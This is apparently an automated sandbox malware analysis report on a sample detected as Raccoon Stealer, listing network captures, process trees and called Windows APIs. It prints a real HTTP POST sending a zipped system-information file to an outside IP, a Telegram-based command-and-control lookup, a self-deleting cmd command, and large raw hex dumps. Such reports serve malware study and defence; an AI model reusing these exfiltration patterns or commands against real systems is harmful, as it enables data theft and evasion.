                                                                                                  Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04
                                                                                                  Data Ascii: PKznN<{rinssdbm3.dll|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8K*grL*H.v6[*4I{1g<>M$G&Y-O9\,tWmX Y3*S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ*3\G5dZhVLZ|k5XFYlVVWC|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{|!OM>>$\.%LzFl3|0#*N+85NU4+bfS2:cz1C@AZ&woR@
                                                                                                  Sep 27, 2021 20:31:43.977555037 CEST1121INData Raw: 78 94 da 61 fb 01 40 e9 d2 80 fd c0 27 00 d7 18 c1 c5 72 4d 82 ea 19 92 5f b0 99 a4 31 f5 a5 cb a1 91 96 1b 9a 95 f5 ee 31 e8 34 b5 7e b8 f9 f2 f5 6e 00 c5 04 a0 b8 45 ec 21 e8 9c 06 80 2f 30 d6 5e 83 e8 4e a8 1b 1c ea e7 1c 31 9d 1f 8c 6b 9a 2a
                                                                                                  Data Ascii: xa@'rM_114~nE!/0^N1k*9k/#o(WBKST|(e9~V`PJ16}"LV@!@2 c54 I8 mG;C^W,E+f*Y52u`E9IbN
                                                                                                  Sep 27, 2021 20:31:43.977579117 CEST1123INData Raw: ca 09 4b d8 45 4d 08 f2 26 04 d8 33 97 53 bd 80 92 e5 24 ec 39 91 2b 3d 82 75 43 bb 9c f2 e7 a6 36 77 bc 90 cf 27 e9 08 f5 eb 08 dd 5b c0 11 ca 07 4d 1d 2f 22 64 0a 06 58 e7 39 9d fd 48 ff e0 82 53 59 b5 2d 3c 25 9d d7 c6 5f 06 d9 8d 46 68 85 19
                                                                                                  Data Ascii: KEM&3S$9+=uC6w'[M/"dX9HSY-<%_Fh,d^'EPpzkg,|s 9y K+r7KoW'_nmR{](8.A=N?3L0eVZ['!Qmr4i@;n{eR% {Cm0d
                                                                                                  Sep 27, 2021 20:31:43.977602959 CEST1124INData Raw: 4b 63 2f 61 42 fd 98 fc c1 6c c0 b7 fa da b1 01 f9 85 3c b4 11 88 3f 80 5a e4 49 00 8d c7 b6 a9 59 e9 58 f5 02 f1 66 e5 01 15 49 39 05 4c 1d 0e 0a f9 39 24 50 0d 88 5e f1 58 a5 19 01 66 ca a0 d9 9b 6b 08 57 90 74 61 dd b3 8b fa 51 fd b6 93 34 06
                                                                                                  Data Ascii: Kc/aBl<?ZIYXfI9L9$P^XfkWtaQ4k&J*~D7U_`G_i?p|-lCAm;lSUvbgF^>BYDQ_2)<|Z,`T_,!RLljLWkQ
                                                                                                  Sep 27, 2021 20:31:43.977626085 CEST1126INData Raw: 68 db 63 7f e2 75 60 58 8a ed 5e 00 18 e6 98 ee 01 8b fd 37 9e 84 a5 3f ea 36 95 57 17 ee b4 28 6b 0b 41 11 b9 20 ba 76 45 b9 69 97 b5 0a aa 2f 7f 6b eb 08 8c 0f b1 78 c5 4f 2a 96 e1 9c d6 e6 ef 7e 2f c7 d2 33 38 84 d0 ac 38 b0 42 a9 2e d4 e0 47
                                                                                                  Data Ascii: hcu`X^7?6W(kA vEi/kxO*~/388B.G]}`|`T{bs+$drL-#!Jk0@5nj)tyJS{rB&K7e`X9<Xs^ Y**G**j)KoQFC5
                                                                                                  Sep 27, 2021 20:31:43.977648020 CEST1127INData Raw: fd 17 d5 f3 02 42 a2 56 e0 1c 97 f1 a8 e0 03 11 11 7b 24 a0 ed c7 e2 94 bd 36 6c 68 ba 91 e5 a7 cb 30 3d 6c 0d cd d8 34 f8 36 94 11 60 2f 00 5e f6 2c bf 39 37 53 68 90 06 e5 5d a2 39 9c 09 57 93 f4 f7 60 cb 29 9c 8b 75 9a 2b f7 56 48 2f ba 0e 97
                                                                                                  Data Ascii: BV{$6lh0=l46`/^,97Sh]9W`)u+VH/)n}<X/&Q&l2,56uQ4q%{QG}#m-fkx?E.<epHZP[7\Y0**kG_`~l}/
                                                                                                  Sep 27, 2021 20:31:43.978985071 CEST1128INData Raw: eb 51 74 50 c2 eb a9 06 0e 75 73 59 50 0c bf 42 e0 ae 40 95 7d 6f 51 b2 29 83 2e 0d 19 0a 65 53 8f 35 cb 3b 83 66 71 5b 01 00 e1 e3 e4 52 17 60 df 7e d3 18 76 bb b8 bd bb b1 47 25 2f 25 18 70 41 4b 0d 0a 54 8a 15 9d 03 cb 4f 6c cf 02 e9 3d 38 0e
                                                                                                  Data Ascii: QtPusYPB@}oQ).eS5;fq[R`~vG%/%pAKTOl=8dArTjD#Yw7$%q\>{4-PV`=1(6YgosdIn~-{2EWUJQ&,}_B~nqdc:T$FEa}
                                                                                                  Sep 27, 2021 20:31:43.979017973 CEST1130INData Raw: 6b bb dc a5 11 6f 79 97 fb ba 88 77 69 97 7b 79 c4 bb ac cb bd 2c e2 5d de e5 5e 1a f1 5e d7 e5 ae 8a 78 2b ba dc 95 11 af bb cb ed 8e 78 2b bb dc 15 11 6f 55 74 ef 9f d1 59 e8 93 3e 8f b5 40 20 01 e4 9b 56 53 57 a5 29 52 a5 75 99 69 ed bf ab 52
                                                                                                  Data Ascii: koywi{y,]^^x+x+oUtY>@ VSW)RuiR3*?TwU"ns,jpv\zB};8*?)?!a[O sag^D. ezs|/:LHH+3
                                                                                                  Sep 27, 2021 20:31:43.979048014 CEST1131INData Raw: 35 58 32 ed a0 e8 69 b9 ef 7a c1 d1 b2 c8 87 3e 01 f3 a9 42 7d a5 9b 38 5b 00 c0 28 44 27 97 e7 f8 c2 67 19 6a 2a dc 69 3a 84 bb 10 5e 2b 96 ac de 68 9d a9 cb e4 26 67 96 17 81 0c 71 01 fb 3b 47 68 7f 4d e7 c9 70 15 7a 07 f9 59 e6 5b 34 70 8a cf
                                                                                                  Data Ascii: 5X2iz>B}8[(D'gj*i:^+h&gq;GhMpzY[4pFmweE2dMlJ:`?F?9B-Vm@FijB];il!*u&d]4>;6kV(sTf_`zM.{Hh6V+XCTn
                                                                                                  Sep 27, 2021 20:31:43.979080915 CEST1131INData Raw: 7e a2 0f 48 60 9a d0 a5 6e cb 4b 75 3e 96 a5 43 5b 0b d2 f1 98 db d2 1d c2 02 1a b4 ed ce a8 38 13 34 19 07 7b ff 2f dc 83 aa 42 2c f6 8c 61 fd 05 2c da cf 9d ac 9c 4a 20 bf f3 68 78 86 b6 bd 00 8a 84 e2 d6 b1 83 7f d1 1b 0f 92 30 4c 93 c1 7e 41
                                                                                                  Data Ascii: ~H`nKu>C[84{/B,a,J hx0L~AGi,|]"#rUV76j]3>j>}ye1iab-mMx>VH0>}T?]pr':rEz@PXe6nY"B]
                                                                                                  Sep 27, 2021 20:31:44.030337095 CEST1133INData Raw: eb 8c 54 99 00 bf 91 2a b3 bc cb 29 6c cf 45 fc 56 59 00 bd 3e b6 f7 38 29 68 b8 18 0f 85 6b 52 02 ca 47 47 c9 3b 8f a3 3d bc 00 de 21 6e 7b b4 ed f9 72 b7 05 25 b8 fa e3 d4 1c b5 2f fe 43 dd d7 02 28 d4 ae 5d c3 fe d8 8b 3e 2d 4f f5 d2 96 a8 b4
                                                                                                  Data Ascii: T*)lEVY>8)hkRGG;=!n{r%/C(]>-O&QOYl`)4U4wGZ9m@g9>?S{_>qgSrm8@NVAY9B3EP\)>|.[vBoK^w+
                                                                                                  Sep 27, 2021 20:31:47.146648884 CEST4058OUTPOST / HTTP/1.1
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: Keep-Alive
                                                                                                  Pragma: no-cache
                                                                                                  Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV
                                                                                                  Content-Length: 1017
                                                                                                  Host: 194.180.174.100
                                                                                                  Sep 27, 2021 20:31:47.146759033 CEST4059OUTData Raw: 28 1d 72 0d 0a 2d 2d 76 44 32 74 4c 31 71 43 39 62 43 33 7a 56 39 65 44 39 79 58 38 64 55 38 79 59 38 6c 43 31 63 56 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 47 35 47
                                                                                                  Data Ascii: (r--vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVcontent-disposition: form-data; name="G5GYJXwB3dP17Spz8m-L"; filename="G5GYJXwB3dP17Spz8m-L.zip"Content-Type: application/octet-streamPK ;S^>System Info.txtUT*Ra*Ra*Ra
                                                                                                  Sep 27, 2021 20:31:47.478635073 CEST4059INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 27 Sep 2021 18:31:47 GMT
                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: keep-alive
                                                                                                  Vary: Accept-Encoding
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Data Raw: 32 38 0d 0a 66 66 33 33 62 38 39 62 64 38 65 36 35 66 63 38 33 37 31 30 39 63 39 65 35 66 35 35 64 61 65 30 39 34 39 38 64 39 38 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 28ff33b89bd8e65fc837109c9e5f55dae09498d9850


                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.549742149.154.167.99443C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-09-27 18:31:39 UTC0OUTGET /agrybirdsgamerept HTTP/1.1
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: Keep-Alive
                                                                                                  Pragma: no-cache
                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                  Host: t.me
                                                                                                  2021-09-27 18:31:39 UTC0INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0
                                                                                                  Date: Mon, 27 Sep 2021 18:31:39 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 4597
                                                                                                  Connection: close
                                                                                                  Set-Cookie: stel_ssid=8f899ca2783178ab00_11525714243972296431; expires=Tue, 28 Sep 2021 18:31:39 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                  Pragma: no-cache
                                                                                                  Cache-control: no-store
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Strict-Transport-Security: max-age=35768000
                                                                                                  2021-09-27 18:31:39 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65 74 61
                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @agrybirdsgamerept</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="agrybirdsgamerept"><meta


                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  Analysis Process: 31cGYywxgy.exe PID: 3104 Parent PID: 2188

                                                                                                  General

                                                                                                  Start time:20:31:31
                                                                                                  Start date:27/09/2021
                                                                                                  Path:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user\Desktop\31cGYywxgy.exe'
                                                                                                  Imagebase:0x400000
                                                                                                  File size:422400 bytes
                                                                                                  MD5 hash:7739202A73E3F1C15F5F5E6F82434955
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: cmd.exe PID: 6524 Parent PID: 3104

                                                                                                  General

                                                                                                  Start time:20:31:47
                                                                                                  Start date:27/09/2021
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'
                                                                                                  Imagebase:0x150000
                                                                                                  File size:232960 bytes
                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: conhost.exe PID: 6540 Parent PID: 6524

                                                                                                  General

                                                                                                  Start time:20:31:48
                                                                                                  Start date:27/09/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: timeout.exe PID: 6608 Parent PID: 6524

                                                                                                  General

                                                                                                  Start time:20:31:49
                                                                                                  Start date:27/09/2021
                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:timeout /T 10 /NOBREAK
                                                                                                  Imagebase:0x7ff797770000
                                                                                                  File size:26112 bytes
                                                                                                  MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Chronological Activities

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Reset < >

                                                                                                    Analysis Process: 31cGYywxgy.exe PID: 3104 Parent PID: 2188 31cGYywxgy.exeCOMMON

                                                                                                    Executed Functions

                                                                                                    Function 0042C383, Relevance: 144.8, APIs: 34, Strings: 45, Instructions: 6501threadsleepsynchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0042C388
                                                                                                    • CoInitialize.OLE32(00000000), ref: 0042C3A4
                                                                                                      • Part of subcall function 004360E7: OpenMutexA.KERNEL32 ref: 00436130
                                                                                                      • Part of subcall function 004360E7: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0043613D
                                                                                                    • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00432A17
                                                                                                      • Part of subcall function 00438DFD: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
                                                                                                      • Part of subcall function 00438DFD: OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
                                                                                                      • Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
                                                                                                      • Part of subcall function 00438DFD: GetLastError.KERNEL32 ref: 00438E3A
                                                                                                      • Part of subcall function 00438DFD: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
                                                                                                      • Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
                                                                                                      • Part of subcall function 00438DFD: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
                                                                                                      • Part of subcall function 00438DFD: GlobalFree.KERNEL32 ref: 00438E92
                                                                                                    • GetUserDefaultLCID.KERNEL32(00001001,?,000000FF), ref: 0042C3E8
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000), ref: 0042C3EF
                                                                                                      • Part of subcall function 00438EA2: __EH_prolog.LIBCMT ref: 00438EA7
                                                                                                      • Part of subcall function 00438EA2: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00438F09
                                                                                                      • Part of subcall function 00438EA2: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00438F23
                                                                                                      • Part of subcall function 00438EA2: OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,00000000), ref: 00438F97
                                                                                                      • Part of subcall function 00438EA2: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,00000000), ref: 00438FA9
                                                                                                      • Part of subcall function 00438EA2: DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,?,00000000), ref: 00438FC4
                                                                                                      • Part of subcall function 00438EA2: CloseHandle.KERNEL32(?,?,?,00000000), ref: 00438FD1
                                                                                                      • Part of subcall function 00438EA2: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00438FE4
                                                                                                      • Part of subcall function 00414F98: __EH_prolog.LIBCMT ref: 00414F9D
                                                                                                    • Sleep.KERNEL32(00001388,00489110,00000000,0047935B), ref: 0042C988
                                                                                                      • Part of subcall function 004358BF: __EH_prolog.LIBCMT ref: 004358C4
                                                                                                    • GetUserNameA.ADVAPI32(?,00000101), ref: 0042CB6C
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                    • Sleep.KERNEL32(00007530), ref: 0042CD2A
                                                                                                      • Part of subcall function 00423759: __EH_prolog.LIBCMT ref: 0042375E
                                                                                                    • _strlen.LIBCMT ref: 0042CE4B
                                                                                                    • _strlen.LIBCMT ref: 0042CE65
                                                                                                    • CreateThread.KERNEL32 ref: 0042D0AF
                                                                                                    • CreateThread.KERNEL32 ref: 0042D0C1
                                                                                                    • StrToIntA.SHLWAPI(00000000,00000000,00489798), ref: 0042D203
                                                                                                      • Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7
                                                                                                      • Part of subcall function 004344AA: __EH_prolog.LIBCMT ref: 004344AF
                                                                                                      • Part of subcall function 004344AA: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00488780,0000000F,00000001), ref: 004344ED
                                                                                                      • Part of subcall function 004344AA: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00434511
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    • CreateThread.KERNEL32 ref: 0042D524
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0042D52D
                                                                                                    • CreateThread.KERNEL32 ref: 0042D0D3
                                                                                                      • Part of subcall function 00432C77: __EH_prolog.LIBCMT ref: 00432C7C
                                                                                                      • Part of subcall function 004296D2: __EH_prolog.LIBCMT ref: 004296D7
                                                                                                      • Part of subcall function 00438CD8: __EH_prolog.LIBCMT ref: 00438CDD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$Create$OpenToken$ProcessThread$DeallocateFileGlobalInformationMutexNameSleepUser_strlen$AllocCloseConvertCurrentDefaultDuplicateEnvironmentErrorFirstFreeHandleHttpInfoInitializeLastLocaleModuleObjectProcess32SingleSnapshotStringToolhelp32UninitializeVariableWait_strcat
                                                                                                    • String ID: $&$($,$/$0$2$25ef3d2ceb7c85368a843a6d0ff8291d $4$5$7$9DdPQajmZndZ4qCLnM5Gu8kEArObEJr9kpZfshjMFLdbDkIa0SdMPw== $:$<$<$=$C$C$G$GET$H$N$O$POST$Q$Q$S$V$W$[$\$_$_id$b$f$h$p$qSVdAbi/K2pPr/3e18wU+9RXCqXPWsSoxpYUtF+O $r$s$s$v${$}$~
                                                                                                    • API String ID: 376243089-3970548752
                                                                                                    • Opcode ID: da2981c851184b2fa7643d0d1ca98076d3d836111e0a2cb6e59a3499d969c3d3
                                                                                                    • Instruction ID: 4fe60910e1ec4b79d226cabb142ab88437985495ab14f2297e82cd6290d5d1cb
                                                                                                    • Opcode Fuzzy Hash: da2981c851184b2fa7643d0d1ca98076d3d836111e0a2cb6e59a3499d969c3d3
                                                                                                    • Instruction Fuzzy Hash: DED39F34D052A89ADF25E765DC51BEDBBB46F25308F0004DEA54973293DE782B88CF29
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00437819, Relevance: 104.4, APIs: 13, Strings: 46, Instructions: 1169COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0043781E
                                                                                                      • Part of subcall function 004373C6: __EH_prolog.LIBCMT ref: 004373CB
                                                                                                      • Part of subcall function 004373C6: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?), ref: 0043746F
                                                                                                      • Part of subcall function 004373C6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?), ref: 004374BD
                                                                                                      • Part of subcall function 004373C6: RegCloseKey.ADVAPI32(?,?,?), ref: 004374C6
                                                                                                    • _strftime.LIBCMT ref: 0043794F
                                                                                                    • GetUserDefaultLCID.KERNEL32(00001001,?,00000100,?,?,?,?,?), ref: 00437978
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000), ref: 0043797F
                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00437BD0
                                                                                                    • GetComputerNameA.KERNEL32(?,00000101), ref: 00438275
                                                                                                    • GetUserNameA.ADVAPI32(00000001,00000101), ref: 004382EF
                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,00000000,00000012,00000040,00000001), ref: 0043861D
                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,00000000,00000012,00000040,00000001), ref: 00438707
                                                                                                    • GetSystemMetrics.USER32 ref: 0043888C
                                                                                                      • Part of subcall function 00439503: __EH_prolog.LIBCMT ref: 00439508
                                                                                                      • Part of subcall function 00413B98: __EH_prolog.LIBCMT ref: 00413B9D
                                                                                                    • GetSystemMetrics.USER32 ref: 004388B4
                                                                                                    • EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00438950
                                                                                                    • EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 004389AC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
